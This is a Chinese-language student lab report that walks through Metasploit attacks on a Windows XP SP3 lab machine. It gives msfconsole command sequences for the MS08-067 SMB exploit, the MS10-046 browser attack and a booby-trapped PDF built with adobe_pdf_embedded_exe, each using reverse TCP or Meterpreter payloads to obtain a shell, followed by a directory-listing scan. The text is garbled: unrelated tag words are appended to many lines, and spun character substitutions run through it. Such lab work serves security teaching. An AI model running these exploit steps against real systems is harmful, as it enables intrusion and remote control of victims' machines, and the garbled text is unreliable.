一、用本身的话解释什么是exploit,payload,encode?shell
msf仅仅是一个攻击平台,攻击具体的实现仍是要靠抓住靶机上的漏洞进行。本次实验我对metasploit的体系结构有了初步的认识。尤为是对6个主要模块的功能和用途有了深刻理解和实践经验。我也深入的认识到在现实中想要真正攻陷一台靶机仍是有难度的,由于本次实验我使用的靶机是win xp sp3英文版系统。很老,应该算是被淘汰的了,因此才会有那么多漏洞让我能够抓住去攻击,如今windows版本不断更新,漏洞补丁的更新速度也愈来愈快,所以更体现出了0 day漏洞的价值。windows
攻击机:Kali(IP:192.168.248.128)api
靶机:Windows XP SP3(IP:192.168.248.129)浏览器
一、先用search ms08_067指令查询该攻击模块。网络
二、输入use exploit/windows/smb/ms08_067_netapi使用该模块,并用show payloads指令查看一下要用的payload。session
三、输入set payload generic/shell_reverse_tcp设置一下payload,经过反向链接获取shell。tcp
四、使用show options指令查看须要进行的配置。编码
五、如图所示进行配置,设置RHOST为远程靶机IP地址、LHOST为主机IP地址。url
六、设置完成后再次确认刚才的设置。3d
七、输入exploit发起攻击。
八、攻击成功,成功获取靶机系统shell。
一、先利用search ms10_046指令查看能够运用的攻击模块.
二、使用该漏洞进行攻击。
三、设置相关参数。SRVHOST是本地监听主机的IP地址,LHOST是监听的IP地址,都填攻击者本机IP地址。
四、发起攻击,能够看到,生成了url连接地址。
五、咱们使用靶机的IE浏览器登录一下刚才生成的url地址。
六、发现主机这边已经攻击成功了。
七、使用命令sessions -i 1开始链接,成功获得shell。
一、进入文件攻击目录选择一个合适的adobe漏洞。
二、我选择的是adobe_pdf_embedded_exe,use这个漏洞。
三、设置一下payload攻击有效载荷:set payload windows/meterpreter/reverse_tcp
四、show options查看须要进行哪些配置。
五、设置文件名称5239.pdf,LHOST为攻击者主机IP。
六、再次使用show options检查配置。
七、发起攻击。发现生成了一个名为5239的pdf文件。
八、把攻击主机设置为监听状态,方法和之前的实验相似。
九、将该pdf拷贝到靶机上而后打开。
十、攻击机已经成功获取到靶机shell。
一、先用search了解一下有关scanner/http/dir_listing的相关信息。
二、设置相关参数。
三、run,运行成功。